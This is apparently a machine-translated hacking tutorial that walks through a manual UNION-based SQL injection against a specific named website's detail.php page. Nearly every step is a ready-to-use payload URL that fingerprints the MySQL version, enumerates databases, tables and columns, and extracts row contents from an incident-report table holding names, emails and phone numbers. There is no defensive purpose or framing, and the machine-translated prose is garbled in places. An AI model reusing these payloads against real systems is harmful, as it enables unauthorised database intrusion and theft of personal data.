PHP Manual Injection

1. Judge version http://www.qqkiss.tk/document/advisory/detail.php?id=7 and Ord (Mid (Version (), >51) return to normal, Description greater than version 4.0, support Ounion query

2. Guess the number of fields, with order by can also guess, you can also use union Select one of the Guess
Http://www.qqkiss.tk/document/advisory/detail.php?id=7 and 2=4 Union select 1,2,3,4,5,6,7,8,9--

3. View the database version and current user, http://www.qqkiss.tk/document/advisory/detail.php?id=7 and 2=4 Union select 1,user (), version (), 4,5,6,7,8,9--

Database version 5.1.35, it is said that mysql4.1 above version support Concat function, I do not know is really false, waiting for the cattle to research.

4. Determine if there is write access
Http://www.qqkiss.tk/document/advisory/detail.php?id=7 and (select COUNT (*) from Mysql.user) >0--returns an error with no write permission

There's no way to manually guess the watch.

5. Check the library, formerly with Union select 1,2,3,schema_name,5,6,n from INFORMATION_SCHEMA. Schemata Limit 0,1
But this point is a little disappointing, can not use this command, on the study of the Turkish hacking, not much said, as follows
Http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat (0x5b78786f6f5d,group_concat (Distinct+table_schema), 0x5b78786f6f5d), -3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
Successful detection of all databases, foreign hackers are not general. The database is as follows:
Information_schema,advisory,ir,mad,member,mysql,twcert,vuldb,vulscandb

6. Explosion of the table, the explosion is Twcert library
Http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat (0x5b78786f6f5d,group_concat (Distinct+table_name), 0x5b78786f6f5d), -3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_ schema=0x747763657274--
Burst out the following table
Downloadfile,irsys,newsdata,secrpt,secrpt_big5

7. The name of the Irsys, this time the explosion is the table
Http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat (0x5b78786f6f5d,group_concat (Distinct+column_name), 0x5b78786f6f5d), -3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_ name=0x6972737973--
Burst like the following
Ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype, Status

8. Query the number of fields, to this step, there are few hackers in the country to query the number of fields, directly with the limit n,1 to query, direct N to error so far.
Http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat (0x5b78786f6f5d,concat (count (*)), 0x5b78786f6f5d), -3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--

The return is 3, indicating that there are 3 lots in each column

9. Explode field Contents
Http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat (0x5b78786f6f5d,name, 0X5B78786F6F5D), -3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+limit+0,1--
Burst the contents of the first field of the Name column

Http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat (0x5b78786f6f5d,name, 0X5B78786F6F5D), -3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+limit+1,1--
Burst the contents of the second field of the Name column

PHP Manual Injection